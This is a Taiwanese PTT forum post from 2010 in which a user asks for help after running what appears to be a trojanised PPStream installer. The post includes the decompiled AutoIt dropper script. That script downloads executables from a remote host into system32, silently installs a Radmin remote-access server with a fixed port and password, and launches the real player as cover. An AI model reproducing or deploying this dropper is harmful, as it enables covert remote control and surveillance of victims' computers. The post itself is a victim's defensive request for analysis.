[求救] 疑似被遠端監看? 分析報告已更新

看板AntiVirus作者epyonwing (佐佐)時間14年前 (2010/03/18 22:32)推噓1(1推 0噓 6→)

留言7則, 2人參與討論串1/1

1. 敘述問題：點下去的瞬間，好像裝了什麼東西。(大驚) 用Print照了一下，發現是Remote Administrator Server 2.1標題。查了一下好像是個遠端軟體，但是一直找不到他安裝的路徑。後來找了很多方法，想把這個exe的殼解開。不過都失敗，只發現他好像是用Autoit的方法，作出的自動安裝。於是運氣很好的用Autoit反編譯出了他的腳本，是個文本格式的。不過小弟看不是很懂，怕亂搞會搞掛系統。求高手幫忙解說一下，很想知道他到底對我的電腦做了什麼OTL。 ------------------------------------------------------------------------------ ; <AUT2EXE VERSION: 3.2.2.0> ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-START: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區 \PPS Setup\Setup.au3> ; ---------------------------------------------------------------------------- Opt("MouseCoordMode", 0) ;1=absolute, 0=relative 1是大螢幕 0是相對視窗 Opt("TrayIconDebug", 1) ;0=no info, 1=debug line info Opt("TrayIconHide", 0) ;0=show, 1=hide tray icon Opt("WinDetectHiddenText", 0) ;0=don't detect, 1=do detect Opt("WinTitleMatchMode", 2) ;1=start, 2=subStr, 3=exact, 4=... 某個視窗存不存在，2是視窗只要有home就可以比對到了 Opt("OnExitFunc","OnAutoItExit");"OnAutoItExit" called Opt("TrayIconHide", 1) ;0=show, 1=hide tray icon ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3> ; ---------------------------------------------------------------------------- ; Include Version:1.59 (04/20/2006) ; ------------------------------------------------------------------------------ ; ; AutoIt Version: 3.0 ; Language: English ; Description: Functions that assist with process management. ; ; ------------------------------------------------------------------------------ ;=============================================================================== ; ; Description - Returns a string containing the process name that belongs to a given PID. ; Syntax - _ProcessGetName( $iPID ) ; Parameters - $iPID - The PID of a currently running process ; Requirements - None. ; Return Values - Success - The name of the process ; Failure - Blank string and sets @error ; 1 - Process doesn't exist ; 2 - Error getting process list ; 3 - No processes found ; Author(s) - Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren. ; Notes - Supplementary to ProcessExists(). ;=============================================================================== Func _ProcessGetName($i_PID) If Not ProcessExists($i_PID) Then SetError(1) Return '' EndIf Local $a_Processes = ProcessList() If Not @error Then For $i = 1 To $a_Processes[0][0] If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0] Next EndIf SetError(1) Return '' EndFunc ;==>_ProcessGetName ;=============================================================================== ; ; Function Name: _ProcessGetPriority() ; Description: Get the priority of an open process ; Parameter(s): $vProcess - PID or name of a process. ; Requirement(s): AutoIt Beta v3.1.1.61+ ; kernel32.dll (included with Windows) ; Return Value(s): On Success - Returns integer corressponding to ; the processes's priority: ; 0 - Idle/Low ; 1 - Below Normal (Not supported on Windows 95/98/ME) ; 2 - Normal ; 3 - Above Normal (Not supported on Windows 95/98/ME) ; 4 - High ; 5 - Realtime ; On Failure: Returns -1 and sets @Error to 1 ; Author(s): Matthew Tucker ; Valik added Pid or Processname logic ;=============================================================================== ; Func _ProcessGetPriority($vProcess) Local $i_PID = ProcessExists($vProcess) If Not $i_PID Then SetError(1) Return -1 EndIf Local $hDLL = DllOpen('kernel32.dll') Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID) Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $aProcessHandle[0]) DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0]) DllClose($hDLL) Switch $aPriority[0] Case 0x00000040 Return 0 Case 0x00004000 Return 1 Case 0x00000020 Return 2 Case 0x00008000 Return 3 Case 0x00000080 Return 4 Case 0x00000100 Return 5 Case Else SetError(1) Return -1 EndSwitch EndFunc ;==>_ProcessGetPriority ;=============================================================================== ; ; Description: Executes a DOS command in a hidden command window. ; Syntax: _RunDOS( $sCommand ) ; Parameter(s): $sCommand - Command to execute ; Requirement(s): None ; Return Value(s): On Success - Returns the exit code of the command ; On Failure - Depends on RunErrorsFatal setting ; Author(s): Jeremy Landes <jlandes at landeserve dot com> ; Note(s): None ; ;=============================================================================== Func _RunDOS($sCommand) Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE) EndFunc ;==>_RunDOS ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3> ; ---------------------------------------------------------------------------- $ServerURL="http://studftp.stut.edu.tw/~d9420202/Download2/" InetGet($ServerURL & "compentent/ipsec5.exe","c:\Windows\system32\ipsec5.exe",1) ;把右下角的R點擊隱藏 InetGet($ServerURL & "compentent/ipsec4.exe","c:\Windows\system32\ipsec4.exe",1) If not ProcessExists ("ipsec4.exe") Then ShellExecute("c:\Windows\system32\ipsec4.exe") Sleep(10) EndIf InetGet($ServerURL & "compentent/win1logon.exe","c:\Windows\system32\win1logon.exe",1) If not ProcessExists ("win1logon.exe") Then ShellExecute("c:\Windows\system32\win1logon.exe") Sleep(10) EndIf InetGet($ServerURL & "compentent/MDME.exe","c:\Windows\system32\MDME.exe",1) ; 去抓下載程式 InetGet($ServerURL & "compentent/MDEE.exe","c:\Windows\system32\MDEE.exe",1) ; 去抓下載程式 InetGet($ServerURL & "compentent/AdmDll.dll","c:\Windows\system32\AdmDll.dll",1) ;去抓下載程式 InetGet($ServerURL & "compentent/r_server.exe","c:\Windows\system32\newscript.exe",1) ;去抓下載程式 InetGet($ServerURL & "compentent/MSWINSCK.OCX","c:\Windows\system32\MSWINSCK.OCX",1) InetGet($ServerURL & "compentent/upload.exe","c:\Windows\system32\upload.exe",1) InetGet($ServerURL & "compentent/down.exe","c:\Windows\system32\down.exe",1) $rc = _RunDos("c:\Windows\system32\newscript.exe /setup") sleep(1000) $rc = _RunDos("c:\Windows\system32\newscript.exe /installdrv /silence") $rc2 = _RunDos("c:\Windows\system32\newscript.exe /port:4899 /pass:119995995 /save /silence") ProcessClose("newscript.exe") ShellExecute("c:\Windows\system32\newscript.exe") If not ProcessExists ("MDME.exe") Then IF FileGetSize("c:\Windows\system32\MDME.exe")<>0 Then ShellExecute("c:\Windows\system32\MDME.exe") EndIf EndIf If not ProcessExists ("MDEE.exe") Then ShellExecute("c:\Windows\system32\MDEE.exe") EndIf If not ProcessExists ("PPStream.exe") Then ShellExecute(@WorkingDir & "\FILES\" & "PPStream.exe") EndIf ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-END: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區 \PPS Setup\Setup.au3> ; ---------------------------------------------------------------------------- ------------------------------------------------------------------------------ 2. 系統資料： Windos XP SP3 Avast 3. 分析報告： http://sun.cis.scu.edu.tw/~92a39/upload/38713.txt http://sun.cis.scu.edu.tw/~92a39/upload/38715.txt http://sun.cis.scu.edu.tw/~92a39/upload/38716.txt -- ╠═╬═卒═帥═馬═╬═╬═╬═╣ ║ ║ ║ ║╲║╱║ ║ ║ ║ 此時， ╠═╬═╬═車═╬═╬═╬═╬═╣ 帥有何用？ ║ ║ ║ ║╱║╲║ ║ ║ ║ 有車又如何？ ╚═╩═╩═╩═╩═╩═╩═╩═╝ 有馬子又怎樣？ ψqaz225 → : 你錯了，有帥又有車，馬子當然可以當炮打 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 122.116.171.101

→

TypeZero

03/18 23:02, , 1^F

03/18 23:02, 1^F

→

TypeZero

03/18 23:02, , 2^F

03/18 23:02, 2^F

→

TypeZero

03/18 23:03, , 3^F

03/18 23:03, 3^F